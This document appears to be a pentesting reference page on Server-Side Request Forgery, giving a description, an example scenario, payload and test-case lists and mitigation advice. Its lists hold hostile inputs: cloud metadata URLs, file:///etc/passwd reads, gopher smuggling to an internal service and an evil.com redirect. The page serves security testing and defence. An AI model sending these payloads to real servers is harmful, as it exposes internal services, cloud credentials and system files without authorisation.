SSRF

Description: Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make requests to internal or external network resources on behalf of the server. This can lead to unauthorized access to internal services, data exfiltration, and potential network enumeration.

Example with Scenario: Imagine a web application that fetches user-supplied URLs to display a thumbnail of the website. If the application does not validate the URL properly, an attacker can provide a URL pointing to an internal service, such as http://localhost/admin, allowing the attacker to access internal resources.

Payloads:

  1. Access Internal Services:

    http://localhost/admin
    http://127.0.0.1/admin
    http://internal-service.local/admin
  2. Access Metadata Services (Cloud environments):

    http://169.254.169.254/latest/meta-data/
    http://169.254.169.254/computeMetadata/v1/
  3. Open Redirect Exploitation:

    http://example.com/?url=http://evil.com
  4. File Inclusion:

    file:///etc/passwd
    file:///C:/Windows/system32/drivers/etc/hosts
  5. Protocol Smuggling:

    gopher://localhost:11211/_stats
    ftp://ftp.example.com/file.txt
  6. DNS Rebinding:

    http://malicious.com (which resolves to an internal IP after initial DNS resolution)

Test Cases:

  1. Basic Internal Access:

    http://localhost:80
    http://127.0.0.1:8080
  2. Private IP Ranges:

    http://192.168.1.1:80
    http://10.0.0.1:8080
  3. Accessing Metadata Services:

    http://169.254.169.254/latest/meta-data/
  4. File Access:

    file:///etc/passwd
    file:///C:/Windows/System32/drivers/etc/hosts
  5. Alternative Protocols:

    ftp://example.com/file.txt
    gopher://localhost:11211/_stats
  6. Custom Headers:

    http://example.com -H 'Host: internal-service.local'

Mitigation:

  1. Input Validation and Whitelisting:

    • Validate and sanitize user inputs. Only allow URLs that match a strict whitelist of allowed domains and protocols.

  2. Disable Unnecessary Protocols:

    • Restrict the application from using protocols other than HTTP/HTTPS.

  3. Network Segmentation:

    • Ensure the server cannot access internal services or sensitive resources directly.

  4. Metadata Service Protection:

    • In cloud environments, limit access to metadata services through firewall rules or IAM roles.

  5. Use a URL Parsing Library:

    • Use a robust URL parsing library to handle URL validation and prevent bypasses using encoding or other tricks.

  6. Timeouts and Retries:

    • Implement timeouts and retry limits on server-side requests to avoid exploitation of long-running requests.

  7. Monitor and Alert:

    • Set up monitoring and alerting for unusual server-side request patterns.

Last updated